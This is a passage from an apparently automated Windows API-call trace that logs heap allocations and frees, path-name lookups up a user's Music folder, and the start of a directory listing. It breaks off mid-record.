Size=0x830) returned 0x2ac3dd0 [0199.553] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.553] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.553] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.553] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0199.553] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0199.554] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.554] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0199.554] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.554] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.554] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0199.554] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.555] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.555] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.555] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0199.555] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2aeaea0 [0199.555] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.555] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0199.556] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.556] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.556] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0199.556] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.556] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.556] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.557] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0199.557] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.557] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.557] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.557] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0199.558] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.558] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.558] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.558] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0199.558] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.558] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.558] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.559] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0199.559] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0199.559] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.559] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0199.559] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.560] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.560] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0199.560] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.560] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.560] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.560] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0199.561] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.561] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.561] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.561] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0199.561] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.562] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.562] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.562] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0199.562] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.562] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.562] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.562] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0199.563] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.563] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.563] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.563] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0199.563] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.564] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.564] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.564] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0199.564] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.564] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.564] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.565] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0199.565] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.565] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.565] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.565] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0199.566] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.566] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.566] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.566] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0199.566] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0199.566] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.567] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0199.567] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.567] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.567] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0199.568] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.568] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.568] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.568] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0199.568] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.569] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.569] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.569] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0199.569] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.569] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.569] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.570] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0199.570] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.570] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.570] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.570] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0199.571] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.571] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.571] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.571] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0199.571] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0199.571] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.572] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0199.572] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.572] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.572] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0199.572] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.573] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.573] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.573] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0199.573] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.574] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.574] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.574] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0199.574] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.574] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.574] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.574] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0199.575] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.575] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.575] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.575] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0199.575] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.576] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.576] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.576] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0199.576] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.576] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.576] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.577] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0199.577] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.577] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.577] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.577] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0199.578] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.578] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.578] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.578] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0199.578] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.579] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.579] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.579] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0199.579] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0199.579] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.579] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0199.580] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.580] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.580] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0199.580] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.580] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.580] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.580] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0199.581] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.581] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.581] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.581] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0199.582] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.582] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.582] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.582] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0199.582] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.583] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.583] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.583] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0199.583] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.583] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.583] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.584] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0199.584] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0199.585] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.585] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0199.585] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.585] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.585] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0199.586] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.586] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.586] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.586] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0199.586] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.586] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.586] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.587] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0199.587] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.587] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.587] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.587] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0199.588] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.588] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.588] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.588] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0199.588] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.588] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.588] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.589] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0199.589] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.589] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.589] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.589] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Music\\j ucK2lALp_iPp\\47m5sv0uqVNl\\AZ2aRaMGzQB\\") returned="AZ2aRaMGzQB\\" [0199.589] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0199.589] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbbc0 [0199.589] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.589] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Music\\j ucK2lALp_iPp\\47m5sv0uqVNl\\") returned="47m5sv0uqVNl\\" [0199.589] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ee78 [0199.590] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbbc0 | out: hHeap=0x2c0000) returned 1 [0199.590] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Music\\j ucK2lALp_iPp\\") returned="j ucK2lALp_iPp\\" [0199.590] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ade980 [0199.590] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ee78 | out: hHeap=0x2c0000) returned 1 [0199.590] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Music\\") returned="Music\\" [0199.590] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0199.590] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade980 | out: hHeap=0x2c0000) returned 1 [0199.590] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0199.591] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0199.591] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0199.591] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0199.591] PathFindFileNameW (pszPath="") returned="" [0199.591] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Music\\j ucK2lALp_iPp\\47m5sv0uqVNl\\AZ2aRaMGzQB\\*" (normalized: "c:\\users\\keecfmwgj\\music\\j uck2lalp_ipp\\47m5sv0uqvnl\\az2aramgzqb\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x11071cb0, ftCreationTime.dwHighDateTime=0x1d8983f, ftLastAccessTime.dwLowDateTime=0xd1e8c170, ftLastAccessTime.dwHighDateTime=0x1d89913, ftLastWriteTime.dwLowDateTime=0xd1e8c170, ftLastWriteTime.dwHighDateTime=0x1d89913, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0199.594] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.594] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x11071cb0, ftCreationTime.dwHighDateTime=0x1d8983f, ftLastAccessTime.dwLowDateTime=0xd1e8c170, ftLastAccessTime.dwHighDateTime=0x1d89913, ftLastWriteTime.dwLowDateTime=0xd1e8c170, ftLastWriteTime.dwHighDateTime=0x1d89913, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, 